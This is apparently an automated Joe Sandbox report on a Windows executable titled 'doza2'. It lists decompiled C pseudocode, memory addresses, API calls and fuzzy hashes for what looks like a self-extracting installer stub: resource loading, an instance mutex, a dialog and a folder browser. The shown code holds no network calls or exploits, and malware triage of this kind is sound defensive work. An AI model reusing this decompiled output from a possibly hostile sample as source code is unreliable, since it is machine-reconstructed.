                                                                                                                                                                                                                                    0x00962de3
                                                                                                                                                                                                                                    0x00962e04
                                                                                                                                                                                                                                    0x00962e0a
                                                                                                                                                                                                                                    0x00962e10
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962e10
                                                                                                                                                                                                                                    0x00962dd3
                                                                                                                                                                                                                                    0x00962dbb
                                                                                                                                                                                                                                    0x00962da1
                                                                                                                                                                                                                                    0x00962d5b
                                                                                                                                                                                                                                    0x00962d5b
                                                                                                                                                                                                                                    0x00962d5d
                                                                                                                                                                                                                                    0x00962d69
                                                                                                                                                                                                                                    0x00962d6e
                                                                                                                                                                                                                                    0x00962f06
                                                                                                                                                                                                                                    0x00962f06
                                                                                                                                                                                                                                    0x00962f06
                                                                                                                                                                                                                                    0x00962d59
                                                                                                                                                                                                                                    0x00962f18

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00962CD9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00962CE9
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00962CF9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00962D34
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 00962D40
                                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00962DAE
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 00962DBD
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(doza2,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 00962E0A
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$doza2
                                                                                                                                                                                                                                    • API String ID: 1002816675-859929227
                                                                                                                                                                                                                                    • Opcode ID: b3702df0e6ccb303bf1eca370cafe7dbdfa8de03ff9db105e5d75263d812a593
                                                                                                                                                                                                                                    • Instruction ID: e396a5e1e6e7cdbff546c31cb9c23059f12fbe6375f0d424aa23b760f17c566b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3702df0e6ccb303bf1eca370cafe7dbdfa8de03ff9db105e5d75263d812a593
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E2512670358701ABE721AB609D1AB7B36DDEB82744F14403DF981D61E1DFF98C81EA22
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009634F0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119threadwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 81%
                                                                                                                                                                                                                                    			E009634F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
				void* _t9;
				void* _t12;
				void* _t13;
				void* _t17;
				void* _t23;
				void* _t25;
				struct HWND__* _t35;
				struct HWND__* _t38;
				void* _t39;

				_t9 = _a8 - 0x10;
				if(_t9 == 0) {
					__eflags = 1;
					L19:
					_push(0);
					 *0x9691d8 = 1;
					L20:
					_push(_a4);
					L21:
					EndDialog();
					L22:
					return 1;
				}
				_push(1);
				_pop(1);
				_t12 = _t9 - 0xf2;
				if(_t12 == 0) {
					__eflags = _a12 - 0x1b;
					if(_a12 != 0x1b) {
						goto L22;
					}
					goto L19;
				}
				_t13 = _t12 - 0xe;
				if(_t13 == 0) {
					_t35 = _a4;
					 *0x968584 = _t35;
					E009643D0(_t35, GetDesktopWindow());
					__eflags =  *0x968184; // 0x1
					if(__eflags != 0) {
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
					}
					SetWindowTextA(_t35, "doza2");
					_t17 = CreateThread(0, 0, E00964FE0, 0, 0, 0x968798);
					 *0x96879c = _t17;
					__eflags = _t17;
					if(_t17 != 0) {
						goto L22;
					} else {
						E009644B9(_t35, 0x4b8, 0, 0, 0x10, 0);
						_push(0);
						_push(_t35);
						goto L21;
					}
				}
				_t23 = _t13 - 1;
				if(_t23 == 0) {
					__eflags = _a12 - 2;
					if(_a12 != 2) {
						goto L22;
					}
					ResetEvent( *0x96858c);
					_t38 =  *0x968584; // 0x0
					_t25 = E009644B9(_t38, 0x4b2, 0x961140, 0, 0x20, 4);
					__eflags = _t25 - 6;
					if(_t25 == 6) {
						L11:
						 *0x9691d8 = 1;
						SetEvent( *0x96858c);
						_t39 =  *0x96879c; // 0x0
						E00963680(_t39);
						_push(0);
						goto L20;
					}
					__eflags = _t25 - 1;
					if(_t25 == 1) {
						goto L11;
					}
					SetEvent( *0x96858c);
					goto L22;
				}
				if(_t23 == 0xe90) {
					TerminateThread( *0x96879c, 0);
					EndDialog(_a4, _a12);
					return 1;
				}
				return 0;
			}












                                                                                                                                                                                                                                    0x009634fb
                                                                                                                                                                                                                                    0x009634fe
                                                                                                                                                                                                                                    0x00963665
                                                                                                                                                                                                                                    0x00963666
                                                                                                                                                                                                                                    0x00963666
                                                                                                                                                                                                                                    0x00963668
                                                                                                                                                                                                                                    0x0096366e
                                                                                                                                                                                                                                    0x0096366e
                                                                                                                                                                                                                                    0x00963671
                                                                                                                                                                                                                                    0x00963671
                                                                                                                                                                                                                                    0x00963677
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963677
                                                                                                                                                                                                                                    0x00963504
                                                                                                                                                                                                                                    0x00963506
                                                                                                                                                                                                                                    0x00963507
                                                                                                                                                                                                                                    0x0096350c
                                                                                                                                                                                                                                    0x0096365b
                                                                                                                                                                                                                                    0x0096365f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963661
                                                                                                                                                                                                                                    0x00963512
                                                                                                                                                                                                                                    0x00963515
                                                                                                                                                                                                                                    0x009635be
                                                                                                                                                                                                                                    0x009635c1
                                                                                                                                                                                                                                    0x009635d1
                                                                                                                                                                                                                                    0x009635d8
                                                                                                                                                                                                                                    0x009635de
                                                                                                                                                                                                                                    0x009635f8
                                                                                                                                                                                                                                    0x00963617
                                                                                                                                                                                                                                    0x00963617
                                                                                                                                                                                                                                    0x00963623
                                                                                                                                                                                                                                    0x00963637
                                                                                                                                                                                                                                    0x0096363d
                                                                                                                                                                                                                                    0x00963642
                                                                                                                                                                                                                                    0x00963644
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963646
                                                                                                                                                                                                                                    0x00963652
                                                                                                                                                                                                                                    0x00963657
                                                                                                                                                                                                                                    0x00963658
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963658
                                                                                                                                                                                                                                    0x00963644
                                                                                                                                                                                                                                    0x0096351b
                                                                                                                                                                                                                                    0x0096351d
                                                                                                                                                                                                                                    0x0096354f
                                                                                                                                                                                                                                    0x00963553
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096355f
                                                                                                                                                                                                                                    0x00963565
                                                                                                                                                                                                                                    0x0096357c
                                                                                                                                                                                                                                    0x00963581
                                                                                                                                                                                                                                    0x00963584
                                                                                                                                                                                                                                    0x0096359b
                                                                                                                                                                                                                                    0x009635a1
                                                                                                                                                                                                                                    0x009635a7
                                                                                                                                                                                                                                    0x009635ad
                                                                                                                                                                                                                                    0x009635b3
                                                                                                                                                                                                                                    0x009635b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009635b8
                                                                                                                                                                                                                                    0x00963586
                                                                                                                                                                                                                                    0x00963588
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963590
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963590
                                                                                                                                                                                                                                    0x00963524
                                                                                                                                                                                                                                    0x00963535
                                                                                                                                                                                                                                    0x00963541
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00963549
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000), ref: 00963535
                                                                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00963541
                                                                                                                                                                                                                                    • ResetEvent.KERNEL32 ref: 0096355F
                                                                                                                                                                                                                                    • SetEvent.KERNEL32(00961140,00000000,00000020,00000004), ref: 00963590
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 009635C7
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 009635F1
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 009635F8
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000083B), ref: 00963610
                                                                                                                                                                                                                                    • SendMessageA.USER32(00000000), ref: 00963617
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 00963623
                                                                                                                                                                                                                                    • CreateThread.KERNEL32 ref: 00963637
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00963671
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                                                    • String ID: doza2
                                                                                                                                                                                                                                    • API String ID: 2406144884-612509477
                                                                                                                                                                                                                                    • Opcode ID: 12f1566be514fe67073806be8250b375c1b4713af84d278564c8553d801bb792
                                                                                                                                                                                                                                    • Instruction ID: fb24dd5b365148a3cafba592f8d1632be4513ac6f2601f5bc7d146f248da3e3d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 12f1566be514fe67073806be8250b375c1b4713af84d278564c8553d801bb792
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7231957125C301BBDB201F25EC4EE2B3A7CE7C6B41F548A1DF616A52A0CBB58901EF55
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00964224 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 132libraryloaderCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 50%
                                                                                                                                                                                                                                    			E00964224(char __ecx) {
				char* _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				_Unknown_base(*)()* _v20;
				char* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				_Unknown_base(*)()* _t26;
				_Unknown_base(*)()* _t28;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t32;
				char _t42;
				char* _t44;
				char* _t61;
				void* _t63;
				char* _t65;
				struct HINSTANCE__* _t66;
				char _t67;
				void* _t71;
				char _t76;
				intOrPtr _t85;

				_t67 = __ecx;
				_t66 = LoadLibraryA("SHELL32.DLL");
				if(_t66 == 0) {
					_t63 = 0x4c2;
					L22:
					E009644B9(_t67, _t63, 0, 0, 0x10, 0);
					return 0;
				}
				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
				_v12 = _t26;
				if(_t26 == 0) {
					L20:
					FreeLibrary(_t66);
					_t63 = 0x4c1;
					goto L22;
				}
				_t28 = GetProcAddress(_t66, 0xc3);
				_v20 = _t28;
				if(_t28 == 0) {
					goto L20;
				}
				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
				_v16 = _t29;
				if(_t29 == 0) {
					goto L20;
				}
				_t76 =  *0x9688c0; // 0x0
				if(_t76 != 0) {
					L10:
					 *0x9687a0 = 0;
					_v52 = _t67;
					_v48 = 0;
					_v44 = 0;
					_v40 = 0x968598;
					_v36 = 1;
					_v32 = E00964200;
					_v28 = 0x9688c0;
					 *0x96a288( &_v52);
					_t32 =  *_v12();
					if(_t71 != _t71) {
						asm("int 0x29");
					}
					_v12 = _t32;
					if(_t32 != 0) {
						 *0x96a288(_t32, 0x9688c0);
						 *_v16();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
						if( *0x9688c0 != 0) {
							E00961680(0x9687a0, 0x104, 0x9688c0);
						}
						 *0x96a288(_v12);
						 *_v20();
						if(_t71 != _t71) {
							asm("int 0x29");
						}
					}
					FreeLibrary(_t66);
					_t85 =  *0x9687a0; // 0x0
					return 0 | _t85 != 0x00000000;
				} else {
					GetTempPathA(0x104, 0x9688c0);
					_t61 = 0x9688c0;
					_t4 =  &(_t61[1]); // 0x9688c1
					_t65 = _t4;
					do {
						_t42 =  *_t61;
						_t61 =  &(_t61[1]);
					} while (_t42 != 0);
					_t5 = _t61 - _t65 + 0x9688c0; // 0x12d1181
					_t44 = CharPrevA(0x9688c0, _t5);
					_v8 = _t44;
					if( *_t44 == 0x5c &&  *(CharPrevA(0x9688c0, _t44)) != 0x3a) {
						 *_v8 = 0;
					}
					goto L10;
				}
			}




























                                                                                                                                                                                                                                    0x00964234
                                                                                                                                                                                                                                    0x0096423c
                                                                                                                                                                                                                                    0x00964240
                                                                                                                                                                                                                                    0x009643b2
                                                                                                                                                                                                                                    0x009643b7
                                                                                                                                                                                                                                    0x009643c0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009643c5
                                                                                                                                                                                                                                    0x0096424c
                                                                                                                                                                                                                                    0x00964252
                                                                                                                                                                                                                                    0x00964257
                                                                                                                                                                                                                                    0x009643a4
                                                                                                                                                                                                                                    0x009643a5
                                                                                                                                                                                                                                    0x009643ab
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009643ab
                                                                                                                                                                                                                                    0x00964263
                                                                                                                                                                                                                                    0x00964269
                                                                                                                                                                                                                                    0x0096426e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096427a
                                                                                                                                                                                                                                    0x00964280
                                                                                                                                                                                                                                    0x00964285
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096428d
                                                                                                                                                                                                                                    0x00964293
                                                                                                                                                                                                                                    0x009642e6
                                                                                                                                                                                                                                    0x009642e9
                                                                                                                                                                                                                                    0x009642ef
                                                                                                                                                                                                                                    0x009642f4
                                                                                                                                                                                                                                    0x009642f7
                                                                                                                                                                                                                                    0x00964300
                                                                                                                                                                                                                                    0x00964307
                                                                                                                                                                                                                                    0x0096430e
                                                                                                                                                                                                                                    0x00964315
                                                                                                                                                                                                                                    0x0096431c
                                                                                                                                                                                                                                    0x00964322
                                                                                                                                                                                                                                    0x00964326
                                                                                                                                                                                                                                    0x0096432d
                                                                                                                                                                                                                                    0x0096432d
                                                                                                                                                                                                                                    0x0096432f
                                                                                                                                                                                                                                    0x00964334
                                                                                                                                                                                                                                    0x00964343
                                                                                                                                                                                                                                    0x00964349
                                                                                                                                                                                                                                    0x0096434d
                                                                                                                                                                                                                                    0x00964354
                                                                                                                                                                                                                                    0x00964354
                                                                                                                                                                                                                                    0x0096435d
                                                                                                                                                                                                                                    0x0096436e
                                                                                                                                                                                                                                    0x0096436e
                                                                                                                                                                                                                                    0x0096437d
                                                                                                                                                                                                                                    0x00964383
                                                                                                                                                                                                                                    0x00964387
                                                                                                                                                                                                                                    0x0096438e
                                                                                                                                                                                                                                    0x0096438e
                                                                                                                                                                                                                                    0x00964387
                                                                                                                                                                                                                                    0x00964391
                                                                                                                                                                                                                                    0x00964399
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964295
                                                                                                                                                                                                                                    0x0096429f
                                                                                                                                                                                                                                    0x009642a5
                                                                                                                                                                                                                                    0x009642aa
                                                                                                                                                                                                                                    0x009642aa
                                                                                                                                                                                                                                    0x009642ad
                                                                                                                                                                                                                                    0x009642ad
                                                                                                                                                                                                                                    0x009642af
                                                                                                                                                                                                                                    0x009642b0
                                                                                                                                                                                                                                    0x009642b6
                                                                                                                                                                                                                                    0x009642c2
                                                                                                                                                                                                                                    0x009642c8
                                                                                                                                                                                                                                    0x009642ce
                                                                                                                                                                                                                                    0x009642e4
                                                                                                                                                                                                                                    0x009642e4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009642ce

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00964236
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 0096424C
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00964263
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 0096427A
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,009688C0,?,00000001), ref: 0096429F
                                                                                                                                                                                                                                    • CharPrevA.USER32(009688C0,012D1181,?,00000001), ref: 009642C2
                                                                                                                                                                                                                                    • CharPrevA.USER32(009688C0,00000000,?,00000001), ref: 009642D6
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00964391
                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 009643A5
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                    • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                    • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                    • Opcode ID: 6f9890a659de9fc27d03eacddd001e08104666868bd5d681c81fae0399c3f74f
                                                                                                                                                                                                                                    • Instruction ID: 88012912e58b0a8d3a22b53b36ec917d7b2f3d436276ead17ff1fed55ad7ba4f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f9890a659de9fc27d03eacddd001e08104666868bd5d681c81fae0399c3f74f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 614117B4A04304AFD711AFB4DC98AAF7BB8EB46344F54026EE951A3351CFB58C41DB61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009644B9 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 160memorywindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                                                                                                    			E009644B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
				signed int _v8;
				char _v64;
				char _v576;
				void* _v580;
				struct HWND__* _v584;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t34;
				void* _t37;
				signed int _t39;
				intOrPtr _t43;
				signed int _t44;
				signed int _t49;
				signed int _t52;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				int _t64;
				void* _t66;
				intOrPtr* _t67;
				signed int _t69;
				intOrPtr* _t73;
				intOrPtr* _t76;
				intOrPtr* _t77;
				void* _t80;
				void* _t81;
				void* _t82;
				intOrPtr* _t84;
				void* _t85;
				signed int _t89;

				_t75 = __edx;
				_t34 =  *0x968004; // 0xf4cc89a0
				_v8 = _t34 ^ _t89;
				_v584 = __ecx;
				_t83 = "LoadString() Error.  Could not load string resource.";
				_t67 = _a4;
				_t69 = 0xd;
				_t37 = memcpy( &_v64, _t83, _t69 << 2);
				_t80 = _t83 + _t69 + _t69;
				_v580 = _t37;
				asm("movsb");
				if(( *0x968a38 & 0x00000001) != 0) {
					_t39 = 1;
				} else {
					_v576 = 0;
					LoadStringA( *0x969a3c, _t75,  &_v576, 0x200);
					if(_v576 != 0) {
						_t73 =  &_v576;
						_t16 = _t73 + 1; // 0x1
						_t75 = _t16;
						do {
							_t43 =  *_t73;
							_t73 = _t73 + 1;
						} while (_t43 != 0);
						_t84 = _v580;
						_t74 = _t73 - _t75;
						if(_t84 == 0) {
							if(_t67 == 0) {
								_t27 = _t74 + 1; // 0x2
								_t83 = _t27;
								_t44 = LocalAlloc(0x40, _t83);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									_t75 = _t83;
									_t74 = _t80;
									E00961680(_t80, _t83,  &_v576);
									goto L23;
								}
							} else {
								_t76 = _t67;
								_t24 = _t76 + 1; // 0x1
								_t85 = _t24;
								do {
									_t55 =  *_t76;
									_t76 = _t76 + 1;
								} while (_t55 != 0);
								_t25 = _t76 - _t85 + 0x64; // 0x65
								_t83 = _t25 + _t74;
								_t44 = LocalAlloc(0x40, _t25 + _t74);
								_t80 = _t44;
								if(_t80 == 0) {
									goto L6;
								} else {
									E0096171E(_t80, _t83,  &_v576, _t67);
									goto L23;
								}
							}
						} else {
							_t77 = _t67;
							_t18 = _t77 + 1; // 0x1
							_t81 = _t18;
							do {
								_t58 =  *_t77;
								_t77 = _t77 + 1;
							} while (_t58 != 0);
							_t75 = _t77 - _t81;
							_t82 = _t84 + 1;
							do {
								_t59 =  *_t84;
								_t84 = _t84 + 1;
							} while (_t59 != 0);
							_t21 = _t74 + 0x64; // 0x65
							_t83 = _t21 + _t84 - _t82 + _t75;
							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
							_t80 = _t44;
							if(_t80 == 0) {
								goto L6;
							} else {
								_push(_v580);
								E0096171E(_t80, _t83,  &_v576, _t67);
								L23:
								MessageBeep(_a12);
								if(E0096681F(_t67) == 0) {
									L25:
									_t49 = 0x10000;
								} else {
									_t54 = E009667C9(_t74, _t74);
									_t49 = 0x190000;
									if(_t54 == 0) {
										goto L25;
									}
								}
								_t52 = MessageBoxA(_v584, _t80, "doza2", _t49 | _a12 | _a16);
								_t83 = _t52;
								LocalFree(_t80);
								_t39 = _t52;
							}
						}
					} else {
						if(E0096681F(_t67) == 0) {
							L4:
							_t64 = 0x10010;
						} else {
							_t66 = E009667C9(0, 0);
							_t64 = 0x190010;
							if(_t66 == 0) {
								goto L4;
							}
						}
						_t44 = MessageBoxA(_v584,  &_v64, "doza2", _t64);
						L6:
						_t39 = _t44 | 0xffffffff;
					}
				}
				return E00966CE0(_t39, _t67, _v8 ^ _t89, _t75, _t80, _t83);
			}



































                                                                                                                                                                                                                                    0x009644b9
                                                                                                                                                                                                                                    0x009644c4
                                                                                                                                                                                                                                    0x009644cb
                                                                                                                                                                                                                                    0x009644d8
                                                                                                                                                                                                                                    0x009644e4
                                                                                                                                                                                                                                    0x009644eb
                                                                                                                                                                                                                                    0x009644ee
                                                                                                                                                                                                                                    0x009644ef
                                                                                                                                                                                                                                    0x009644ef
                                                                                                                                                                                                                                    0x009644f1
                                                                                                                                                                                                                                    0x009644f7
                                                                                                                                                                                                                                    0x009644f8
                                                                                                                                                                                                                                    0x0096467b
                                                                                                                                                                                                                                    0x009644fe
                                                                                                                                                                                                                                    0x00964509
                                                                                                                                                                                                                                    0x00964518
                                                                                                                                                                                                                                    0x00964525
                                                                                                                                                                                                                                    0x00964562
                                                                                                                                                                                                                                    0x00964568
                                                                                                                                                                                                                                    0x00964568
                                                                                                                                                                                                                                    0x0096456b
                                                                                                                                                                                                                                    0x0096456b
                                                                                                                                                                                                                                    0x0096456d
                                                                                                                                                                                                                                    0x0096456e
                                                                                                                                                                                                                                    0x00964572
                                                                                                                                                                                                                                    0x00964578
                                                                                                                                                                                                                                    0x0096457c
                                                                                                                                                                                                                                    0x009645cb
                                                                                                                                                                                                                                    0x00964607
                                                                                                                                                                                                                                    0x00964607
                                                                                                                                                                                                                                    0x0096460d
                                                                                                                                                                                                                                    0x00964613
                                                                                                                                                                                                                                    0x00964617
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096461d
                                                                                                                                                                                                                                    0x00964623
                                                                                                                                                                                                                                    0x00964626
                                                                                                                                                                                                                                    0x00964628
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964628
                                                                                                                                                                                                                                    0x009645cd
                                                                                                                                                                                                                                    0x009645cd
                                                                                                                                                                                                                                    0x009645cf
                                                                                                                                                                                                                                    0x009645cf
                                                                                                                                                                                                                                    0x009645d2
                                                                                                                                                                                                                                    0x009645d2
                                                                                                                                                                                                                                    0x009645d4
                                                                                                                                                                                                                                    0x009645d5
                                                                                                                                                                                                                                    0x009645db
                                                                                                                                                                                                                                    0x009645de
                                                                                                                                                                                                                                    0x009645e3
                                                                                                                                                                                                                                    0x009645e9
                                                                                                                                                                                                                                    0x009645ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009645f3
                                                                                                                                                                                                                                    0x009645fd
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964602
                                                                                                                                                                                                                                    0x009645ed
                                                                                                                                                                                                                                    0x0096457e
                                                                                                                                                                                                                                    0x0096457e
                                                                                                                                                                                                                                    0x00964580
                                                                                                                                                                                                                                    0x00964580
                                                                                                                                                                                                                                    0x00964583
                                                                                                                                                                                                                                    0x00964583
                                                                                                                                                                                                                                    0x00964585
                                                                                                                                                                                                                                    0x00964586
                                                                                                                                                                                                                                    0x0096458a
                                                                                                                                                                                                                                    0x0096458c
                                                                                                                                                                                                                                    0x0096458f
